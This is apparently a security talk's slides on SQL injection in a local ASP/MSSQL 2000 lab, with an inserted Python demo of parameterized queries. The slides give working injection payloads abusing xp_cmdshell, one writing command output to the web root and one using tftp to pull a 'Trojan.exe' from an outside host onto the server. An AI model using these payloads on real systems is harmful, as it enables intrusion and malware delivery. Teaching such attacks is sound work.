
Page 1: Sql injection exploit

Advanced Exploitation using SQL Injection

By Varun Duggal

Works in the Application Security domain


SQL Injection

The ability to inject SQL commands into the database engine through an existing application

SQL Injection occurs when user-supplied data is sent to an interpreter as part of a command or query

Attackers trick the interpreter into executing unintended commands by supplying specially crafted data

Injection flaws allow attackers to create, read, update, or delete any arbitrary data available to the application

Vulnerable Applications

Almost all SQL databases and programming languages are potentially vulnerable

MS SQL Server, Oracle, MySQL, Postgres, DB2, MS Access, Sybase, Informix, etc

Accessed through applications developed using:

Perl and CGI scripts that access databases

ASP, JSP, PHP

XML, XSL and XSQL

Javascript

VB, MFC, and other ODBC-based tools and APIs

DB-specific web-based applications and APIs

Reports and DB Applications

3GL- and 4GL-based languages (C, OCI, Pro*C, and COBOL)

and many more


Stored procedure

A stored procedure is a subroutine available to applications accessing a relational database system

Stored procedures (sometimes called a sproc or SP) are actually stored in the database data dictionary


Exploiting the Vulnerability

The xp_cmdshell stored procedure, which is built into MS SQL Server by default

Allows users to execute operating system commands


Tasks

Executing any kind of OS command

Ping Server

Directory Listing

Create File

Defacing Website

Execute Applications

Upload and Download files

More Stored Procedures

xp_cmdshell

xp_regread

xp_servicecontrol

xp_availablemedia

xp_enumdsn

xp_loginconfig

xp_makecab

xp_ntsec_enumdomains

xp_terminate_process


Demo

Test Bench

OS: Windows XP Professional

Frontend: ASP

Backend: MSSQL 2000

Web Server: IIS 5.0

Open the URL http://localhost/sql.asp?id=1

Checking Whether It Is Vulnerable

Enter a single quote in the id parameter; the resulting error message indicates that it is vulnerable to SQL injection.
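An added example (not part of the deck) showing why the single-quote probe works against a query built by string concatenation, and how the parameterized form of the same lookup treats the probe as data. It uses Python with an in-memory SQLite table standing in for the demo's MSSQL backend; the table name and sample rows are constructed for this example.

```python
import sqlite3


def setup_db():
    """Constructed in-memory table standing in for the demo's backend (sample data, not the deck's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", [(1, "widget"), (2, "gadget")])
    return conn


def unsafe_sql(user_id):
    # The pattern behind sql.asp?id=...: the parameter is pasted into the SQL text,
    # so a quote closes the literal and anything after it is parsed as SQL.
    return "SELECT id, name FROM products WHERE id = '" + user_id + "'"


def lookup_unsafe(conn, user_id):
    return conn.execute(unsafe_sql(user_id)).fetchall()


def lookup_safe(conn, user_id):
    # Hardened form: the value is bound as a parameter and is never parsed as SQL.
    return conn.execute("SELECT id, name FROM products WHERE id = ?", (user_id,)).fetchall()


def probe(conn, lookup, user_id):
    """Return the row count, or 'error' when the database rejects the statement.

    A database error on the single-quote probe is exactly the signal the deck looks for;
    the parameterized lookup answers the same probe with zero rows and no error.
    """
    try:
        return len(lookup(conn, user_id))
    except sqlite3.Error:
        return "error"


if __name__ == "__main__":
    conn = setup_db()
    for payload in ("1", "1'", "1' OR '1'='1"):
        print(repr(payload),
              "concatenated:", probe(conn, lookup_unsafe, payload),
              "parameterized:", probe(conn, lookup_safe, payload))
```

The same concatenation is what lets the deck's stacked `';exec master..xp_cmdshell ...` statement through on its MSSQL 2000 test bench; xp_cmdshell has been disabled by default since SQL Server 2005 and is toggled with sp_configure, so the default-on behaviour shown applies to that older backend.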


Now open the URL and run the command

';exec master..xp_cmdshell "ipconfig > c:\inetpub\wwwroot\test.txt"--

The file is now created on the web server; access it as shown in the snapshot below:

Uploading a File to the Server

Start a TFTP server hosting the malicious file to be uploaded


Now open the URL and run the command

';exec master..xp_cmdshell "tftp -i 192.168.1.5 GET Trojan.exe C:\Trojan.exe"--

The TFTP server logs show the file being transferred to the server